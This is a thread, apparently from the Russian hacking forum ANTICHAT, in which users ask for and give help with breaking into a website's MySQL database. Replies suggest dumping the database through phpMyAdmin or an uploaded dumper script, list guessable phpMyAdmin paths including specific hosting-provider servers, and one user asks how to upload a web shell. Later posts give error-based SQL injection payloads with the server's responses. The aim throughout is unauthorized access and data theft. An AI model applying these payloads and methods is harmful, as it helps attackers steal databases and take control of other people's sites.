ANTICHAT — форум по информационной безопасности, OSINT и технологиям

попытаться найти sql-inject, если phpmyadmin на сайте не стоит

1. Воспользоваться PhpMyAdmin. (вкладка Export).

2. Залить дампер и слить базу (что-то типа Sypex Dumper и т.д.).

http://sypex.net/ ?

Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?

Ну во-первых, если коннект к базе разрешен извне, можешь залить PhpMyAdmin на любой свой сервер, в конфиге вместо localhost прописать IP сайта / логин и пароль / авторизация http. Или через любые другие утилиты умеющие подключаться к MySQL.

Если с удаленным подключением фейл, можно попробовать типовые пути, вдруг есть на сервере:

1. В корне сайта и в каталоге admin если есть - /pma/, /phpmyadmin/, /myadmin/

2. Те же варианты, только на субдомене - pma.site.com

3. Если это хостинг на базе ISP (только прописывай именно IP а не доменное имя) - https://127.0.0.1/myadmin/

Да, там у них в зависимости от тарифа, имена имеют вид: https://bitrix132.timeweb.ru/pma/index.php и так далее.

У timeweb в зоне субдомена логин или целая площадка? Если площадка возможно повезет:

HTTP

http://phoenix.timeweb.ru/phpMyAdmin/

http://scorpius.timeweb.ru/phpMyAdmin/

HTTPS

https://phoenix.timeweb.ru/pma/

https://scorpius.timeweb.ru/pma/

могу редактировать несколько php файлов на сервере

но к сожалению там ограничение в 500 символов кода

подскажите как можно залить шелл??

делают такой зпрос

'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'

вывод:

Duplicate column name '5.1.69'

отправляю такой запрос

'and(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+1, 1),floor(rand(0)*2))x+from+information_schema.tabl es+group+by+x)a)='1/

вывод:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 1

в чем дело?